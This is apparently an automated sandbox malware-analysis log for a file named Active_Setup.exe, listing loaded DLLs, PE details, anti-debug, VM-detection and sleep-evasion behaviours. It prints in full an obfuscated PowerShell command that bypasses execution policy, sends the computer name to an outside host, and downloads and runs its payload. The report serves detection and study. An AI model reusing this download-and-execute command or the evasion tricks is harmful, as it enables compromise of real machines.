              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Active_Setup.exeStatic file information: File size 76054693 > 1048576
              Source: Active_Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: Active_Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: Active_Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: Active_Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Active_Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: Active_Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: Active_Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Active_Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1940316473.0000000002CB9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbes source: powershell.exe, 00000004.00000002.1944489969.00000000072B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\AWork\DRW15.8AB3\sharelib\EuDownloadPublicLibrary\x86\exe\EuDownload.pdb source: Active_Setup.exe
              Source: Active_Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: Active_Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: Active_Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: Active_Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: Active_Setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\Active_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;
              Source: C:\Users\user\Desktop\Active_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;Jump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01052940 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,0_2_01052940
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0108847D push ecx; ret 0_2_01088490
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01086742 push ecx; ret 0_2_01086755
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0096671D push 75205B8Dh; ret 0_2_00966722
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00970908 push 1E00AF41h; retf 0_2_0097090E
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0097CA46 push eax; mov dword ptr [esp], F7F4F5FAh0_2_0097CA54
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00983401 push cs; ret 0_2_00983403
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0097F8B6 push eax; mov dword ptr [esp], 9AA5A4F7h0_2_0097F8B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02E63AD2 push ebx; retf 4_2_02E63ADA
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FFDB50 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_00FFDB50
              Source: C:\Users\user\Desktop\Active_Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking mutex)
              Source: C:\Users\user\Desktop\Active_Setup.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-126147
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\Active_Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\Active_Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3798Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2329Jump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-126198
              Source: C:\Users\user\Desktop\Active_Setup.exeAPI coverage: 4.7 %
              Source: C:\Users\user\Desktop\Active_Setup.exe TID: 7672Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep count: 3798 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep count: 2329 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01084079 __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,0_2_01084079
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01083B05 __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,0_2_01083B05
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: Active_Setup.exe, 00000000.00000003.1928822586.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000002.1934051476.0000000000B4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
              Source: Active_Setup.exe, 00000000.00000002.1934051476.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1928822586.0000000000B77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000004.00000002.1944489969.000000000727B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
              Source: C:\Users\user\Desktop\Active_Setup.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0107F1F2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0107F1F2
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01052940 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,0_2_01052940
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009402B9 mov edx, dword ptr fs:[00000030h]0_2_009402B9
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00940879 mov eax, dword ptr fs:[00000030h]0_2_00940879
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00940C29 mov eax, dword ptr fs:[00000030h]0_2_00940C29
